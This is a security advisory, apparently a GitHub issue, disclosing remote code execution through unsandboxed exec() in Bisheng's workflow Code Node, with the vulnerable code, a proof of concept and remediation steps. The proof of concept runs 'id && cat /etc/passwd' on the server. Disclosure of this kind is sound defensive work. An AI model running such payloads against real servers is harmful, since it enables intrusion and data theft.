[Security] Arbitrary Code Execution via Unsandboxed exec() in Workflow Code Nodes

[Lihfdgjr]

Security Vulnerability Report

Summary

Bisheng's workflow Code Node executes user-supplied Python code via exec() with unrestricted globals and importlib.import_module() for arbitrary imports. No sandboxing, no import restriction, no builtin restriction. Any authenticated user achieves full RCE on the server.

Severity: HIGH (CVSS 8.8)

• CWE: CWE-94 (Code Injection)
• Affected Component: src/backend/bisheng/workflow/nodes/code/code_parse.py lines 88-96

Vulnerable Code

# code_parse.py lines 88-96
def parse_functions(self, node: ast.FunctionDef):
    compiled_func = compile(ast.Module(body=[node], type_ignores=[]), "<string>", "exec")
    exec(compiled_func, self.exec_globals, self.exec_locals)  # Unrestricted exec

def parse_imports(self, node):
    if isinstance(node, ast.Import):
        for alias in node.names:
            self.exec_globals[alias.asname or alias.name] = importlib.import_module(alias.name)  # Any module allowed

Proof of Concept

Create a workflow with a Code Node containing:

import os
def main(**kwargs):
    return {"output": os.popen("id && cat /etc/passwd").read()}

Execute the workflow - the server runs os.popen("id && cat /etc/passwd") and returns the output.

Impact

Authenticated RCE - any user with workflow creation permissions can execute arbitrary system commands on the server, leading to:

• Full server compromise
• Data exfiltration
• Lateral movement within the network

Remediation

1. Add restricted builtins (remove __import__, eval, exec, compile, open)
2. Implement an import allowlist blocking dangerous modules (os, subprocess, sys, shutil, etc.)
3. Add AST validation to block dangerous function calls before execution

---

Note: This repo does not have private vulnerability reporting enabled via GitHub. Please consider enabling it at Settings > Security > Private vulnerability reporting.